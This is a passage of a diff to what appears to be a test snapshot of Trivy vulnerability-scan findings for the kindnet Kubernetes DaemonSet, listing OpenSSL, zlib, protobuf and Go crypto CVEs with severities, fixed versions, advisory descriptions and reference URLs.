-of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", - "references": [ + "value": "https://bugzilla.redhat.com/2067945", + }, { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "https://github.com/madler/zlib/issues/605", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", - ], - }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://security.gentoo.org/glsa/202210-42", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://ubuntu.com/security/notices/USN-5355-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2097", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2097", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", - "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", - "https://linux.oracle.com/cve/CVE-2022-2097.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", - "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220715-0011/", - "https://security.netapp.com/advisory/ntap-20230420-0008/", - "https://ubuntu.com/security/notices/USN-5502-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2097", - "https://www.debian.org/security/2023/dsa-5343", - "https://www.openssl.org/news/secadv/20220705.txt", - ], - }, - "category": "Vulnerability", - "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "AES OCB fails to encrypt some bytes", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2097", + "value": "https://ubuntu.com/security/notices/USN-5355-2", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", + "value": "https://ubuntu.com/security/notices/USN-5359-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2097", + "value": "https://ubuntu.com/security/notices/USN-5359-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", + "value": "https://ubuntu.com/security/notices/USN-5739-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://www.debian.org/security/2022/dsa-5111", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.3.2", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-3121", + "installedVersion": "v1.3.1", + "packageName": "github.com/gogo/protobuf", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-3121", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", + "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", + "https://github.com/advisories/GHSA-c3h9-896r-86jm", + "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", + "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", + "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", + "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", + "https://pkg.go.dev/vuln/GO-2021-0053", + "https://security.netapp.com/advisory/ntap-20210219-0006/", + "https://www.cve.org/CVERecord?id=CVE-2021-3121", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the "skippy peanut butter" issue.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://avd.aquasec.com/nvd/cve-2021-3121", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://access.redhat.com/security/cve/CVE-2021-3121", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://github.com/advisories/GHSA-c3h9-896r-86jm", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "value": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "value": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", + "value": "https://pkg.go.dev/vuln/GO-2021-0053", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://security.netapp.com/advisory/ntap-20210219-0006/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3121", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20201216223049-8b5274cf687f", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-29652", + "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", + "packageName": "golang.org/x/crypto", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-29652", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", + "https://errata.almalinux.org/8/ALSA-2021-1796.html", + "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", + "https://go-review.googlesource.com/c/crypto/+/278852", + "https://go.dev/cl/278852", + "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", + "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", + "https://linux.oracle.com/cve/CVE-2020-29652.html", + "https://linux.oracle.com/errata/ELSA-2021-1796.html", + "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", + "https://pkg.go.dev/vuln/GO-2021-0227", + "https://www.cve.org/CVERecord?id=CVE-2020-29652", + ], + }, + "category": "Vulnerability", + "description": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.0-20201203163018-be400aefbc4c for Go allows remote attackers to cause a denial of service against SSH servers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "value": "https://avd.aquasec.com/nvd/cve-2020-29652", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "value": "https://access.redhat.com/security/cve/CVE-2020-29652", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "value": "https://errata.almalinux.org/8/ALSA-2021-1796.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "value": "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://go-review.googlesource.com/c/crypto/+/278852", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", + "value": "https://go.dev/cl/278852", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", + "value": "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5502-1", + "value": "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "value": "https://linux.oracle.com/cve/CVE-2020-29652.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5343", + "value": "https://linux.oracle.com/errata/ELSA-2021-1796.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220705.txt", + "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2021-0227", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-29652", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4304", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20211202192323-5770296d904e", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-43565", + "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", + "packageName": "golang.org/x/crypto", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4304", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", - "https://linux.oracle.com/cve/CVE-2022-4304.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", - "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4304", - "https://www.openssl.org/news/secadv/20230207.txt", + "https://access.redhat.com/security/cve/CVE-2021-43565", + "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", + "https://go.dev/cl/368814/", + "https://go.dev/issues/49932", + "https://groups.google.com/forum/#!forum/golang-announce", + "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "https://pkg.go.dev/vuln/GO-2022-0968", + "https://www.cve.org/CVERecord?id=CVE-2021-43565", ], }, "category": "Vulnerability", - "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "timing attack in RSA Decryption implementation", + "name": "golang.org/x/crypto: empty plaintext packet causes panic", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4304", + "value": "https://avd.aquasec.com/nvd/cve-2021-43565", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://access.redhat.com/security/cve/CVE-2021-43565", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4304", + "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://go.dev/cl/368814/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://go.dev/issues/49932", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://groups.google.com/forum/#!forum/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://pkg.go.dev/vuln/GO-2022-0968", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", + "packageName": "golang.org/x/crypto", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + "https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + 